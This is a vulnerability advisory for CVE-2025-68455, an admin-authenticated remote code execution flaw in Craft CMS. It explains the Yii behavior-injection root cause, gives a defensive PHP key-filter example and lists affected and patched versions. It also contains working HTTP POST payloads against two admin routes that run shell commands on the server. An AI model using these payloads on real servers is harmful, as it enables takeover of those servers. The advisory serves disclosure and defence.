CVE-2025-68455: Authenticated remote code execution in Craft CMS
Description
Please note that an attacker must have administrator access to the Craft control panel to exploit this vulnerability. Users should update to a patched version (5.8.21 or 4.16.17) to mitigate the issue.
Summary
The vulnerability was originally reported on 7 August as a vulnerability in the Yii framework. The Yii framework team denied responsibility (placing it with application developers), so no fix has been (and, it seems, will not be) provided at the framework level. I therefore reported the issue to Craft, as I found that it affected the latest (5.6.0) version of Craft CMS.
By using a legitimate but maliciously constructed Yii Behavior class, remote code execution (RCE) can be triggered via Reflection when the tainted Behavior is attached to a Yii Component and an event is triggered on that Component.
Details
The vulnerability is inspired by CVE-2024-4990 but differs from it in that it uses a legitimate Yii Behavior class, abusing the magic methods __set() and __get() to trigger an arbitrary PHP callable and ultimately achieve RCE. It therefore bypasses the mitigations implemented for CVE-2024-4990 and the related CVE-2024-58136.
A Behavior class can be attached to a Yii Component by using the `as <behavior>` syntax in JSON POST input; this was the core of the vulnerability found in CVE-2024-4990. The fix for that vulnerability and for the related CVE-2024-58136 ensured that only classes of type Behavior can be attached to a Component. Craft CMS also implemented additional logic to prevent arbitrary Behavior classes from being attached to vulnerable Components.
A new vulnerability has now been identified that bypasses the fix for the earlier vulnerabilities by using a legitimate but specially constructed Behavior class, namely yii\behaviors\AttributeTypecastBehavior. Attaching this Behavior allows an attacker to define an arbitrary callable that is triggered whenever any event fires on the tainted Component.
Using a wildcard event listener (specified as `on *` in the JSON input) allows an attacker to capture any event invoked on the tainted Component and redirect control flow to AttributeTypecastBehavior's self::beforeSave, which in turn triggers the attacker-defined callable and results in RCE.
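The root cause described above is that a user-supplied JSON document is handed to Yii's object-configuration loader, which treats keys such as `as <name>`, `on <event>`, `__class` and `__construct()` as instructions rather than data. The following added example (not Craft's or Yii's own code, and not the vendor's fix) shows one generic defensive check an application can run on an untrusted array before it reaches Yii::createObject() or Yii::configure(): it walks the decoded JSON and rejects any key that Yii would interpret. The function name `assertNoYiiConfigInjection`, the exception class and the sample input are assumptions constructed for this example; the sample mirrors only the shape of the advisory's payload, with a placeholder in place of the command string.

```php
<?php
// Added example, not code from Craft CMS or the Yii framework: refuse Yii
// object-configuration syntax inside an untrusted (decoded JSON) array.
// Keys checked: "as <name>" (attach a behavior), "on <event>" (attach an
// event handler, including "on *"), "class"/"__class" (class selection) and
// any key ending in "()" such as "__construct()" (constructor arguments /
// method calls). The function name and the reject-everything policy are
// this example's assumptions, not a documented Craft or Yii API.
declare(strict_types=1);

final class UntrustedConfigRejected extends RuntimeException {}

/**
 * Recursively walk $input and throw UntrustedConfigRejected, naming the
 * offending key and its JSON path, if any key would be interpreted by Yii's
 * configuration loader as an instruction. Returns normally if the array is
 * plain data.
 */
function assertNoYiiConfigInjection(array $input, string $path = '$'): void
{
    foreach ($input as $key => $value) {
        if (is_string($key)) {
            $k = strtolower(trim($key));
            $suspicious =
                str_starts_with($k, 'as ')     // "as xxx": behavior attachment
                || str_starts_with($k, 'on ')  // "on *": wildcard event handler
                || $k === '__class'            // class selection (both spellings)
                || $k === 'class'
                || str_ends_with($k, '()');    // "__construct()" and method calls
            if ($suspicious) {
                throw new UntrustedConfigRejected(
                    sprintf('rejected key "%s" at %s', $key, $path)
                );
            }
        }
        if (is_array($value)) {
            assertNoYiiConfigInjection($value, $path . '.' . (string) $key);
        }
    }
}

// Constructed sample input (assumption): same key shape as the advisory's
// payload, with "PLACEHOLDER" standing in for the command string.
$rawBody = <<<'JSON'
{
  "fieldLayoutConfig": {
    "as xxx": {
      "__class": "yii\\behaviors\\AttributeTypecastBehavior",
      "__construct()": [ { "attributeTypes": {}, "typecastBeforeSave": "PLACEHOLDER" } ]
    },
    "on *": "self::beforeSave"
  },
  "cardElements": []
}
JSON;

$untrusted = json_decode($rawBody, true, 512, JSON_THROW_ON_ERROR);

try {
    // Validate first; only pass the array on to Yii if this returns.
    assertNoYiiConfigInjection($untrusted);
    echo "config accepted\n";
} catch (UntrustedConfigRejected $e) {
    // Log the path for the SOC and refuse the request; never fall through
    // to Yii::createObject() / Yii::configure() with the tainted array.
    echo 'config rejected: ' . $e->getMessage() . "\n";
}
```

The check is deliberately an allow-nothing filter on key syntax rather than a class allow-list: the advisory's point is that a class allow-list was bypassed with a legitimate Behavior, so a controller that accepts configuration from the control panel is safer treating the request body as data only and rejecting any key Yii would act on. Rejected requests are also a useful detection signal when logged with the offending key and path.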
See the annotated payload below:
The vulnerability was found to affect two separate controllers/routes in the Craft CMS admin functionality, although there may be others:
/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings
/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview
Proof of Concept (PoC)
- Install Craft CMS via Composer:
$ composer create-project "craftcms/craft" app
- Start Craft CMS with the built-in server:
$ ./craft serve 127.0.0.1:9090
- The following HTTP traces show the payload used to trigger the vulnerability on each vulnerable route.
Against /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings:
POST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings&v=1763562868146 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
... (other headers) ...
Content-Type: application/json
... (other headers) ...

{"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","layoutConfig":{"uid":"08ef66f3-f69e-495b-882f-56834efab200","tabs":[{"name":"Content","uid":"6f1efe1c-2de5-4783-ab39-7ff9149a9c90","userCondition":null,"elementCondition":null,"elements":[{"type":"craft\\fieldlayoutelements\\TitleField","inputType":null,"autocomplete":false,"class":null,"size":null,"name":null,"autocorrect":true,"autocapitalize":true,"disabled":false,"readonly":false,"title":null,"placeholder":null,"step":null,"min":null,"max":null,"requirable":false,"id":null,"containerAttributes":[],"inputContainerAttributes":[],"labelAttributes":[],"orientation":null,"label":null,"instructions":null,"tip":null,"warning":null,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":"2025-11-19T06:33:18-08:00","uid":"bae4dcd7-635b-41fe-96a3-4d3d69e91969","userCondition":null,"elementCondition":null},{"type":"craft\\fieldlayoutelements\\CustomField","handle":null,"label":null,"instructions":null,"tip":null,"warning":null,"required":false,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":null,"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","userCondition":null,"elementCondition":null,"fieldUid":"12ac060b-8c40-48a6-b70f-94361245b149","editCondition":null}]}],"generatedFields":[],"cardView":[],"cardThumbAlignment":"end","type":"craft\\elements\\Category"},"elementType":"craft\\elements\\Category","config":{ "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] }, "typecastBeforeSave": "touch /tmp/touch111" } ] }, "on *": "self::beforeSave" },"settingsNamespace":null,"settings":null}

Against /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview:
POST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview&v=1763562868148 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
... (other headers) ...
Content-Type: application/json
... (other headers) ...

{"fieldLayoutConfig":{ "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] }, "typecastBeforeSave": "touch /tmp/touch222" } ] }, "on *": "self::beforeSave" },"cardElements":[],"showThumb":null,"thumbAlignment":"end"}
- Check the filesystem to confirm that the two files were created in /tmp, confirming the RCE:
$ ls -la /tmp/
...
-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch111
-rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch222
Impact
An attacker with access to the Craft CMS admin functionality (specifically the routes listed above) can trigger RCE on the backend server and potentially gain control of it.
Affected versions
- Composer package: craftcms/cms
- Affected versions:
>= 5.0.0-RC1, <= 5.8.20
>= 4.0.0-RC1, <= 4.16.16
- Patched versions:
5.8.21
4.16.17
References
- GHSA-255j-qw47-wjh5
- craftcms/cms@27f5588
- craftcms/cms@6e608a1
- craftcms/cms@ec43c49
- https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
- https://nvd.nist.gov/vuln/detail/CVE-2025-68455
Credits
Reporter: chutchut